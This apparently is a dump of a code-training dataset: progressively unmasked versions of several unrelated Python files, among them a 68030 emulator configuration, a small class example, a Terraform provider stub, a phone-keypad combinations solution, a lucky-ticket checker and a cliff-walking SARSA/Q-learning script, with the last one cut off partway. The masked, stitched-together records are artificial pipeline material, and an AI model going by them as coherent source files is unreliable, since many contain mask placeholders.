"step-2": "<mask token>\n\n\nclass CB030Remap(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Remap', required_options=[\n 'address'], **options)\n self.size = 4096\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n self.emu.remove_memory(base=0)\n self.emu.add_memory(base=0, size=self._dram_size * 1024 * 1024)\n return 0\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef add_arguments(parser):\n parser.add_argument('--rom', type=str, help='ROM image')\n parser.add_argument('--dram-size', type=int, default=16, help=\n 'DRAM size; boards may have 16, 64 or 128M')\n parser.add_argument('--cf-width', type=int, default=8, help=\n 'CompactFlash interface width, 8 or 16')\n CompactFlash.add_arguments(parser)\n MC68681.add_arguments(parser)\n\n\nclass CB030Remap(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Remap', required_options=[\n 'address'], **options)\n self.size = 4096\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n self.emu.remove_memory(base=0)\n self.emu.add_memory(base=0, size=self._dram_size * 1024 * 1024)\n return 0\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\ndef configure(args):\n \"\"\"create and configure an emulator\"\"\"\n emu = Emulator(args, cpu='68030', frequency=24 * 1000 * 1000)\n emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)\n emu.add_memory(base=4261412864, size=512 * 1024, writable=False,\n from_file=args.rom)\n emu.add_device(args, MC68681, address=4294963200, interrupt=m68k.IRQ_2,\n register_arrangement='16-bit-doubled')\n emu.add_device(args, CompactFlash, address=4294959104,\n register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')\n emu.add_device(args, CB030Remap, address=4294934528)\n emu.add_device(args, CB030Ticker, address=4294938624, interrupt=m68k.IRQ_6)\n return emu\n",
"step-4": "from emulator import Emulator\nfrom device import Device\nfrom devices.compactflash import CompactFlash\nfrom devices.mc68681 import MC68681\nfrom musashi import m68k\n\n\ndef add_arguments(parser):\n parser.add_argument('--rom', type=str, help='ROM image')\n parser.add_argument('--dram-size', type=int, default=16, help=\n 'DRAM size; boards may have 16, 64 or 128M')\n parser.add_argument('--cf-width', type=int, default=8, help=\n 'CompactFlash interface width, 8 or 16')\n CompactFlash.add_arguments(parser)\n MC68681.add_arguments(parser)\n\n\nclass CB030Remap(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Remap', required_options=[\n 'address'], **options)\n self.size = 4096\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n self.emu.remove_memory(base=0)\n self.emu.add_memory(base=0, size=self._dram_size * 1024 * 1024)\n return 0\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\ndef configure(args):\n \"\"\"create and configure an emulator\"\"\"\n emu = Emulator(args, cpu='68030', frequency=24 * 1000 * 1000)\n emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)\n emu.add_memory(base=4261412864, size=512 * 1024, writable=False,\n from_file=args.rom)\n emu.add_device(args, MC68681, address=4294963200, interrupt=m68k.IRQ_2,\n register_arrangement='16-bit-doubled')\n emu.add_device(args, CompactFlash, address=4294959104,\n register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')\n emu.add_device(args, CB030Remap, address=4294934528)\n emu.add_device(args, CB030Ticker, address=4294938624, interrupt=m68k.IRQ_6)\n return emu\n",
"step-5": "from emulator import Emulator\nfrom device import Device\nfrom devices.compactflash import CompactFlash\nfrom devices.mc68681 import MC68681\nfrom musashi import m68k\n\n\ndef add_arguments(parser):\n parser.add_argument('--rom',\n type=str,\n help='ROM image')\n parser.add_argument('--dram-size',\n type=int,\n default=16,\n help='DRAM size; boards may have 16, 64 or 128M')\n parser.add_argument('--cf-width',\n type=int,\n default=8,\n help='CompactFlash interface width, 8 or 16')\n CompactFlash.add_arguments(parser)\n MC68681.add_arguments(parser)\n\n\nclass CB030Remap(Device):\n def __init__(self, args, **options):\n super().__init__(args=args,\n name='CB030Remap',\n required_options=['address'],\n **options)\n\n # no registers, just a 4k aperture\n self.size = 0x1000\n self._did_remap = False\n self._dram_size = args.dram_size\n\n def access(self, operation, offset, size, value):\n if not self._did_remap:\n # remove the low alias of the EEPROM\n self.emu.remove_memory(base=0)\n\n # and add the previously-masked DRAM\n self.emu.add_memory(base=0x0000000, size=self._dram_size * 1024 * 1024)\n\n return 0\n\n\nclass CB030Ticker(Device):\n def __init__(self, args, **options):\n super().__init__(args=args,\n name='CB030Ticker',\n required_options=['address'],\n **options)\n\n # no registers, just a 4k aperture\n self.size = 0x1000\n # core clock @ 24MHz, 100Hz tick rate\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 0x800:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n\n def _start(self):\n if not self._ticker_on:\n self.callback_every(self._tick_cycles, 'tick', self._tick)\n self._ticker_on = True\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\ndef configure(args):\n \"\"\"create and configure an emulator\"\"\"\n\n emu = Emulator(args,\n cpu='68030',\n frequency=24 * 1000 * 1000)\n # initially only the EEPROM exists; aliased at 0 all the way up to 0xfe000000\n # we only map the low and high aliases, as the intermediates aren't interesting\n emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)\n emu.add_memory(base=0xfe000000, size=512 * 1024, writable=False, from_file=args.rom)\n\n emu.add_device(args,\n MC68681,\n address=0xfffff000,\n interrupt=m68k.IRQ_2,\n register_arrangement='16-bit-doubled')\n emu.add_device(args,\n CompactFlash,\n address=0xffffe000,\n register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')\n emu.add_device(args,\n CB030Remap,\n address=0xffff8000)\n emu.add_device(args,\n CB030Ticker,\n address=0xffff9000,\n interrupt=m68k.IRQ_6)\n return emu\n",
"step-ids": [
7,
11,
13,
14,
15
]
}
|
[
7,
11,
13,
14,
15
] |
class Leg():
__smelly = True
def bend_knee(self):
print("knee bent")
@property
def smelly(self):
return self.__smelly
@smelly.setter
def smelly(self,smell):
self.__smelly = smell
def is_smelly(self):
return self.__smelly
|
normal
|
{
"blob_id": "a4ecc578a163ee4657a2c9302f79f15c2e4e39de",
"index": 672,
"step-1": "class Leg:\n <mask token>\n <mask token>\n\n @property\n def smelly(self):\n return self.__smelly\n <mask token>\n\n def is_smelly(self):\n return self.__smelly\n",
"step-2": "class Leg:\n <mask token>\n <mask token>\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self, smell):\n self.__smelly = smell\n\n def is_smelly(self):\n return self.__smelly\n",
"step-3": "class Leg:\n <mask token>\n\n def bend_knee(self):\n print('knee bent')\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self, smell):\n self.__smelly = smell\n\n def is_smelly(self):\n return self.__smelly\n",
"step-4": "class Leg:\n __smelly = True\n\n def bend_knee(self):\n print('knee bent')\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self, smell):\n self.__smelly = smell\n\n def is_smelly(self):\n return self.__smelly\n",
"step-5": "class Leg():\n __smelly = True\n\n def bend_knee(self):\n print(\"knee bent\")\n\n\n @property\n def smelly(self):\n return self.__smelly\n\n @smelly.setter\n def smelly(self,smell):\n self.__smelly = smell\n \n\n def is_smelly(self):\n return self.__smelly",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass
|
normal
|
{
"blob_id": "0ae626df5a471af77f7361bb765b46b861ee8a2c",
"index": 7142,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-3": "import terrascript\n\n\nclass spotinst(terrascript.Provider):\n pass\n",
"step-4": "# terrascript/spotinst/__init__.py\n\nimport terrascript\n\nclass spotinst(terrascript.Provider):\n pass",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def letterCombinations(self, digits):
"""
:type digits: str
:rtype: List[str]
"""
if not digits:
return []
result_set = []
letters = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', '6':
'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}
def permutate(index, result, result_set):
if index == len(digits):
result_set.append(''.join(result))
return
for letter in letters[digits[index]]:
result[index] = letter
permutate(index + 1, result, result_set)
permutate(0, ['' for _ in digits], result_set)
return result_set
|
flexible
|
{
"blob_id": "aec311cae7cb6cbe3e3a927a133ec20a2d2afbf5",
"index": 1312,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if not digits:\n return []\n result_set = []\n letters = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', '6':\n 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}\n\n def permutate(index, result, result_set):\n if index == len(digits):\n result_set.append(''.join(result))\n return\n for letter in letters[digits[index]]:\n result[index] = letter\n permutate(index + 1, result, result_set)\n permutate(0, ['' for _ in digits], result_set)\n return result_set\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Алексей Головлев, группа БСБО-07-19
def lucky(ticket):
def sum_(number):
number = str(number)
while len(number) != 6:
number = '0' + number
x = list(map(int, number))
return sum(x[:3]) == sum(x[3:])
return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'
lastTicket = 123456
print(lucky(100001))
lastTicket = 123321
print(lucky(100001))
|
normal
|
{
"blob_id": "85ac851e28dba3816f18fefb727001b8e396cc2b",
"index": 5278,
"step-1": "<mask token>\n",
"step-2": "def lucky(ticket):\n\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\n<mask token>\n",
"step-3": "def lucky(ticket):\n\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\n<mask token>\nprint(lucky(100001))\n<mask token>\nprint(lucky(100001))\n",
"step-4": "def lucky(ticket):\n\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\nlastTicket = 123456\nprint(lucky(100001))\nlastTicket = 123321\nprint(lucky(100001))\n",
"step-5": "# Алексей Головлев, группа БСБО-07-19\n\ndef lucky(ticket):\n def sum_(number):\n number = str(number)\n while len(number) != 6:\n number = '0' + number\n x = list(map(int, number))\n return sum(x[:3]) == sum(x[3:])\n\n return 'Счастливый' if sum_(ticket) == sum_(lastTicket) else 'Несчастливый'\n\n\nlastTicket = 123456\nprint(lucky(100001))\n\nlastTicket = 123321\nprint(lucky(100001))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<|reserved_special_token_0|>
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
<|reserved_special_token_0|>
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
<|reserved_special_token_0|>
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<|reserved_special_token_0|>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
<|reserved_special_token_0|>
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
<|reserved_special_token_0|>
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
<|reserved_special_token_0|>
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
<|reserved_special_token_0|>
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
def reward(s_1, s_2):
if s_1.is_goal or s_1.is_cliff:
return 0
elif s_2.is_goal:
return 10
elif s_2.is_cliff:
return -100
else:
return -1
<|reserved_special_token_0|>
def transition(stsp, s, di, dj):
if s.is_cliff or s.is_goal:
return s
elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
def action_to_diff_vector(action):
if action == 0:
return -1, 0
elif action == 1:
return 0, 1
elif action == 2:
return 1, 0
elif action == 3:
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma * next_state
.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action
] + learning_rate * (reward(state, next_state) + gamma *
next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 1e-05
epsilon = _epsilon
episode_rewards = []
mistakes_array = []
for i in range(N_STEPS):
current_state = states[N_ROWS - 1][0]
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(
current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(
current_state, next_state, next_action, next_state_action)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
"""
if (i % 100 == 0):
print(i)
"""
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1,
0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,
3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,
0, 0, 0, 0, 0, 0]])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].
q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append('SARSA $\\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append('Q-learning $\\epsilon={}$'.format(mistake_q_learning[0])
)
plt.grid(which='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(
N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=
'anchor')
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)
), ha='center', va='center', color='w')
fig.tight_layout()
ax.set_title('{}; $\\epsilon={}$'.format(method, epsilon))
for i in range(N_ROWS):
str_ = ''
for j in range(N_COLUMNS):
str_ += str(int(final_grid[i][j])) + ', '
PLOTS += 1
def display_optimal_policy(states, method, epsilon):
print('{}; ε = {}'.format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].
get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
print('invalidt method. must be Q_LEARNING or SARSA or both')
import sys
sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = (
run_code(use_q_learning=True, _epsilon=epsilon))
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',
epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(
use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,
fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
for reward in rewards:
plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
<|reserved_special_token_1|>
from math import *
from numpy import *
from random import *
import numpy as np
import matplotlib.pyplot as plt
from colorama import Fore, Back, Style
from gridworld import q_to_arrow
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
